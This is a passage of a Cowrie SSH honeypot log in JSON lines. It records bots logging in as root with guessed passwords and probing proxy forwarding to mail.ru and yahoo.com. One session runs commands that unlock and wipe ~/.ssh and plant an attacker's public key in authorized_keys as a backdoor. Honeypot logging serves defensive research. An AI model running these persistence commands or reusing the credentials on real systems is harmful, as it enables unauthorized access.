mac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:43.753042Z","src_ip":"77.83.207.83","session":"7d7a9c5584a9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:50:43.841336Z","src_ip":"212.227.235.229","session":"687623d528c5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:44.008030Z","src_ip":"77.83.207.83","session":"7d7a9c5584a9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":6417,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:6417","sensor":"my-vps","timestamp":"2025-08-31T03:50:44.060422Z","session":"7d7a9c5584a9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:44.111679Z","src_ip":"77.83.207.83","session":"7d7a9c5584a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57142,"dst_ip":"1.2.3.4","dst_port":22,"session":"e204ebe5e543","protocol":"ssh","message":"New connection: 212.227.235.229:57142 (1.2.3.4:22) [session: e204ebe5e543]","sensor":"my-vps","timestamp":"2025-08-31T03:50:44.115948Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":14422,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:14422","sensor":"my-vps","timestamp":"2025-08-31T03:50:44.257446Z","session":"7d7a9c5584a9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:44.308671Z","src_ip":"77.83.207.83","session":"7d7a9c5584a9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":25566,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:25566","sensor":"my-vps","timestamp":"2025-08-31T03:50:44.453534Z","session":"7d7a9c5584a9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:44.504792Z","src_ip":"77.83.207.83","session":"7d7a9c5584a9"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:44.556807Z","src_ip":"77.83.207.83","session":"7d7a9c5584a9"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":18369,"dst_ip":"1.2.3.4","dst_port":22,"session":"7223fd7a5fa5","protocol":"ssh","message":"New connection: 77.83.207.83:18369 (1.2.3.4:22) [session: 7223fd7a5fa5]","sensor":"my-vps","timestamp":"2025-08-31T03:50:44.605182Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:44.614884Z","src_ip":"77.83.207.83","session":"7223fd7a5fa5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:44.655411Z","src_ip":"77.83.207.83","session":"7223fd7a5fa5"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:50:44.861451Z","src_ip":"212.227.235.229","session":"e204ebe5e543"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:50:44.862047Z","src_ip":"212.227.235.229","session":"e204ebe5e543"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:44.903812Z","src_ip":"77.83.207.83","session":"7223fd7a5fa5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":16221,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:16221","sensor":"my-vps","timestamp":"2025-08-31T03:50:44.954753Z","session":"7223fd7a5fa5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:45.005234Z","src_ip":"77.83.207.83","session":"7223fd7a5fa5"}
{"eventid":"cowrie.login.success","username":"root","password":"pdidc123!@#","message":"login attempt [root/pdidc123!@#] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:45.136560Z","src_ip":"212.227.235.229","session":"687623d528c5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":7340,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:7340","sensor":"my-vps","timestamp":"2025-08-31T03:50:45.147820Z","session":"7223fd7a5fa5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:45.197654Z","src_ip":"77.83.207.83","session":"7223fd7a5fa5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":4526,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:4526","sensor":"my-vps","timestamp":"2025-08-31T03:50:45.339977Z","session":"7223fd7a5fa5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:45.389752Z","src_ip":"77.83.207.83","session":"7223fd7a5fa5"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:45.440345Z","src_ip":"77.83.207.83","session":"7223fd7a5fa5"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":18452,"dst_ip":"1.2.3.4","dst_port":22,"session":"65b1804b1196","protocol":"ssh","message":"New connection: 77.83.207.83:18452 (1.2.3.4:22) [session: 65b1804b1196]","sensor":"my-vps","timestamp":"2025-08-31T03:50:45.490023Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:45.500093Z","src_ip":"77.83.207.83","session":"65b1804b1196"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:45.540313Z","src_ip":"77.83.207.83","session":"65b1804b1196"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:45.790477Z","src_ip":"77.83.207.83","session":"65b1804b1196"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":25123,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:25123","sensor":"my-vps","timestamp":"2025-08-31T03:50:45.841525Z","session":"65b1804b1196"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:45.892039Z","src_ip":"77.83.207.83","session":"65b1804b1196"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":1347,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:1347","sensor":"my-vps","timestamp":"2025-08-31T03:50:46.032506Z","session":"65b1804b1196"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:50:46.076705Z","src_ip":"212.227.235.229","session":"687623d528c5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T03:50:46.077429Z","src_ip":"212.227.235.229","session":"687623d528c5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T03:50:46.078395Z","src_ip":"212.227.235.229","session":"687623d528c5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:46.082940Z","src_ip":"77.83.207.83","session":"65b1804b1196"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":3362,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:3362","sensor":"my-vps","timestamp":"2025-08-31T03:50:46.224690Z","session":"65b1804b1196"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:46.274889Z","src_ip":"77.83.207.83","session":"65b1804b1196"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:46.326464Z","src_ip":"77.83.207.83","session":"65b1804b1196"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":18549,"dst_ip":"1.2.3.4","dst_port":22,"session":"181f94638adb","protocol":"ssh","message":"New connection: 77.83.207.83:18549 (1.2.3.4:22) [session: 181f94638adb]","sensor":"my-vps","timestamp":"2025-08-31T03:50:46.377824Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:46.378605Z","src_ip":"77.83.207.83","session":"181f94638adb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:46.393698Z","src_ip":"212.227.235.229","session":"687623d528c5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:46.431345Z","src_ip":"77.83.207.83","session":"181f94638adb"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:46.693887Z","src_ip":"77.83.207.83","session":"181f94638adb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":9760,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:9760","sensor":"my-vps","timestamp":"2025-08-31T03:50:46.747610Z","session":"181f94638adb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:46.801686Z","src_ip":"77.83.207.83","session":"181f94638adb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":22264,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:22264","sensor":"my-vps","timestamp":"2025-08-31T03:50:46.947055Z","session":"181f94638adb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:46.999805Z","src_ip":"77.83.207.83","session":"181f94638adb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:50:47.081850Z","src_ip":"212.227.235.229","session":"687623d528c5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T03:50:47.082544Z","src_ip":"212.227.235.229","session":"687623d528c5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":11820,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:11820","sensor":"my-vps","timestamp":"2025-08-31T03:50:47.151118Z","session":"181f94638adb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:47.204088Z","src_ip":"77.83.207.83","session":"181f94638adb"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:47.258319Z","src_ip":"77.83.207.83","session":"181f94638adb"}
